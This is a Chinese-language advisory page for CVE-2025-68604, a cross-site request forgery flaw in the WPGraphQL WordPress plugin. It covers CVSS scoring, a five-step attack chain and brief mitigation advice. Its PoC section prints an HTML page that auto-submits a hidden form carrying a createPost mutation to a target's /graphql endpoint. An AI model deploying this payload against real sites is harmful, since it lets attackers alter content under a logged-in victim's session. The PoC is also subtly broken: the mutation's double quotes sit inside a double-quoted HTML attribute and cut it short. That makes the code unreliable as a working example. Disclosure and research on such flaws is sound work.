CVE-2025-68604 CVSS 5.4 中危

CVE-2025-68604 WPGraphQL跨站请求伪造漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-68604

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WPGraphQL

漏洞概述

WPGraphQL插件存在跨站请求伪造（CSRF）漏洞，影响从n/a到2.5.3的版本。由于缺乏足够的请求来源验证，远程攻击者可诱导已登录用户访问恶意链接，在用户不知情的情况下以用户身份执行非预期操作，影响系统完整性与可用性。

技术细节

该漏洞源于WPGraphQL在处理GraphQL请求时未对请求来源进行充分的验证。攻击者可以构造一个特制的HTML页面或恶意链接，其中包含针对目标站点的GraphQL操作请求（如Mutation）。当受害者在浏览器中登录了目标WordPress站点并访问该恶意页面时，浏览器会自动携带受害者的Session Cookie发送请求。由于目标应用未校验请求中的Token或Referer等CSRF防护机制，服务器会误认为是受害者本人发起的合法请求并执行操作。攻击向量为网络（AV:N），无需认证（PR:N），但需要用户交互（UI:R），利用难度较低。

攻击链分析

STEP 1

侦察

攻击者识别出目标WordPress站点安装了存在漏洞的WPGraphQL插件（版本<=2.5.3）。

STEP 2

制作攻击载荷

攻击者编写恶意HTML页面，包含指向目标/graphql端点的POST请求，请求中包含恶意的GraphQL变更操作。

STEP 3

社会工程学诱导

攻击者通过钓鱼邮件或即时通讯工具，诱导已登录目标站点的管理员或用户访问该恶意HTML页面。

STEP 4

执行攻击

受害者浏览器加载页面后，自动携带受害者的Cookie向目标服务器发送GraphQL请求。

STEP 5

达成影响

服务器处理请求并执行操作，导致数据被篡改或服务受到影响，利用了完整性（I:L）和可用性（A:L）影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2025-68604 -->
<!-- This PoC demonstrates a CSRF attack against WPGraphQL -->
<html>
  <body>
    <h1>CSRF PoC</h1>
    <p>Page will attempt to submit a request automatically.</p>
    <form action="http://target-site.com/graphql" method="POST" id="csrf-form">
      <input type="hidden" name="query" value="mutation { createPost(input: {title: "CSRF Hacked", content: "Hacked by CSRF"}) { post { id } } }" />
    </form>
    <script>
      // Auto-submit the form to simulate the attack
      document.getElementById("csrf-form").submit();
    </script>
  </body>
</html>

影响范围

WPGraphQL <= 2.5.3

防御指南

临时缓解措施

如果无法立即升级插件，建议在Web服务器层（如Nginx或Apache）配置访问控制规则，限制对/graphql端点的访问来源，或临时禁用GraphQL功能以防止攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表